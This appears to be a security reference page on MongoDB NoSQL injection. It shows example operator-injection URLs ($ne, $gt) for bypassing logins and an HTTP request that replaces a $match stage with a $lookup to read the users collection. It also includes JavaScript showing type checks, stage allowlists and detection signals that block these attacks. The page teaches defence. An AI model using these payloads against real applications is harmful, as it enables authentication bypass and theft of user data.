NoSQL Injection
Last modified: 2023-03-26
NoSQL injection is the NoSQL counterpart of SQL injection: untrusted input is interpreted by the database as query operators or stages rather than as plain data. It affects NoSQL databases such as MongoDB and Apache Cassandra.
Manual Injection
MongoDB
If the web application uses MongoDB and passes request parameters straight into a query, you might be able to fetch other users' information.
Query operators such as $ne and $gt supplied as parameter values allow authentication to be bypassed, because the comparison no longer tests for the exact credential.
https://vulnerable.com/search?username=admin&password[$ne]=xyz
https://vulnerable.com/search?username[$ne]=admin&role=guest
https://vulnerable.com/search?id[$gt]=1&username=mike
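The following is an added example and is not code from the original page. It models how a bracket-notation query string such as password[$ne]=xyz is parsed into a MongoDB operator object, shows a login filter that is vulnerable to that object beside a hardened version that only accepts plain strings, and evaluates both against a constructed user record with a simplified matcher (the parser, matcher and record are all assumptions written for this example; the real qs module and the real MongoDB matcher are not used and no database is contacted).

```javascript
// Minimal model of bracket-notation parsing (assumed; not the real `qs` module):
// "password[$ne]=xyz" -> { password: { $ne: "xyz" } }
function parseQueryString(query) {
  const params = {};
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const m = /^([^\[]+)\[([^\]]*)\]$/.exec(rawKey);
    if (m) {
      const existing = params[m[1]];
      const target = existing !== null && typeof existing === "object" ? existing : {};
      target[m[2]] = value;
      params[m[1]] = target;
    } else {
      params[rawKey] = value;
    }
  }
  return params;
}

// Simplified model of how MongoDB evaluates a filter against one document.
// Only equality, $ne and $gt are modelled; this is not the real matcher.
function matchesFilter(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      return Object.entries(cond).every(([op, operand]) => {
        if (op === "$ne") return doc[field] !== operand;
        if (op === "$gt") return doc[field] > operand;
        throw new Error(`operator ${op} not modelled`);
      });
    }
    return doc[field] === cond;
  });
}

// Vulnerable: whatever the parser produced goes straight into the filter,
// so an object like { $ne: "xyz" } becomes a query operator.
function buildLoginFilterUnsafe(params) {
  return { username: params.username, password: params.password };
}

// Hardened: credentials must be plain strings. Any other type (including
// operator objects) is rejected before a query is built.
function buildLoginFilterSafe(params) {
  for (const key of ["username", "password"]) {
    if (typeof params[key] !== "string") {
      throw new TypeError(`${key} must be a string`);
    }
  }
  return { username: params.username, password: params.password };
}

// Constructed sample record for the demonstration. A real application would
// store and compare a password hash, never a plaintext password.
const sampleUser = { username: "admin", password: "correct-horse", role: "admin" };

// Runs one query string through both filter builders and reports the outcome.
function demo(query) {
  const params = parseQueryString(query);
  const unsafeMatch = matchesFilter(sampleUser, buildLoginFilterUnsafe(params));
  let safeResult;
  try {
    safeResult = matchesFilter(sampleUser, buildLoginFilterSafe(params));
  } catch (e) {
    safeResult = `rejected: ${e.message}`;
  }
  return { params, unsafeMatch, safeResult };
}

console.log(demo("username=admin&password[$ne]=xyz"));
console.log(demo("username=admin&password=wrong"));
```

Schema validation at the request boundary (a string type for every credential field, or a library that strips keys beginning with $) is the general form of the check in buildLoginFilterSafe; a detection rule for this class of request is simply any query parameter or JSON body key that contains a $-prefixed operator where the application expects a scalar.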
Retrieve Another Document (MongoDB)
If the website uses MongoDB and builds its aggregation pipeline from a client-supplied $match stage, we can replace that stage with $lookup to join another collection and read the desired fields from it.
First, check whether the $match stage is used by the website.
POST /products HTTP/1.1
...

{
    "$match": {
        "sold": false
    }
}
As above, the website uses the $match stage to fetch data from the "products" collection, so we can change the request body as follows.
Assume both the "products" and "users" collections have an "id" field.
POST /users HTTP/1.1
...

{
    "$lookup": {
        "from": "users",
        "localField": "id",
        "foreignField": "id",
        "as": "test"
    }
}
Then send this request. The response contains the joined "users" documents under the "test" field.
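The following is an added example and is not code from the original page. It shows the server-side check that prevents the stage swap described above: the handler accepts only a $match stage over an allowlist of product fields with scalar values, builds the rest of the pipeline itself, and rejects $lookup or any other stage the client sends. The allowlist of fields (sold, category) and the fixed $project stage are assumptions for this example; no database is contacted.

```javascript
// Assumed allowlist: which "products" fields a client may filter on, and the
// scalar type each must have. Operator objects such as { $ne: true } fail the
// type check, so they cannot be smuggled inside an otherwise valid $match.
const ALLOWED_MATCH_FIELDS = { sold: "boolean", category: "string" };

// Validates one client-supplied stage and returns a cleaned $match object.
// Throws on any stage other than $match, on unknown fields, and on non-scalar values.
function validateProductsMatch(stage) {
  if (stage === null || typeof stage !== "object" || Array.isArray(stage)) {
    throw new Error("stage must be a JSON object");
  }
  const keys = Object.keys(stage);
  if (keys.length !== 1 || keys[0] !== "$match") {
    throw new Error(`unsupported stage: ${keys.join(",")}`);
  }
  const match = stage.$match;
  if (match === null || typeof match !== "object" || Array.isArray(match)) {
    throw new Error("$match must be an object");
  }
  const clean = {};
  for (const [field, value] of Object.entries(match)) {
    const expected = ALLOWED_MATCH_FIELDS[field];
    if (!expected) throw new Error(`field not allowed: ${field}`);
    if (typeof value !== expected) {
      throw new Error(`${field} must be ${expected}, got ${typeof value}`);
    }
    clean[field] = value;
  }
  return clean;
}

// Builds the full pipeline from a raw request body. Only the $match contents
// come from the client; the projection is fixed by the server, so a $lookup
// stage can never reach the database.
function buildProductsPipeline(rawBody) {
  const stage = typeof rawBody === "string" ? JSON.parse(rawBody) : rawBody;
  return [
    { $match: validateProductsMatch(stage) },
    { $project: { _id: 0, name: 1, price: 1, sold: 1 } }, // assumed output fields
  ];
}

// Wrapper that reports the outcome instead of throwing, for logging or tests.
function tryBuildProductsPipeline(rawBody) {
  try {
    return { ok: true, pipeline: buildProductsPipeline(rawBody) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// Constructed request bodies: the legitimate one from the page and the swapped stage.
const legitimateBody = '{"$match": {"sold": false}}';
const swappedBody =
  '{"$lookup": {"from": "users", "localField": "id", "foreignField": "id", "as": "test"}}';
console.log(tryBuildProductsPipeline(legitimateBody));
console.log(tryBuildProductsPipeline(swappedBody));
```

The design choice is to never let a client name a pipeline stage at all: the body is treated as a filter description, and the server decides which stage it becomes. A rejected body with a $lookup, $unionWith, $out or $merge key is a strong signal for detection logging on such an endpoint.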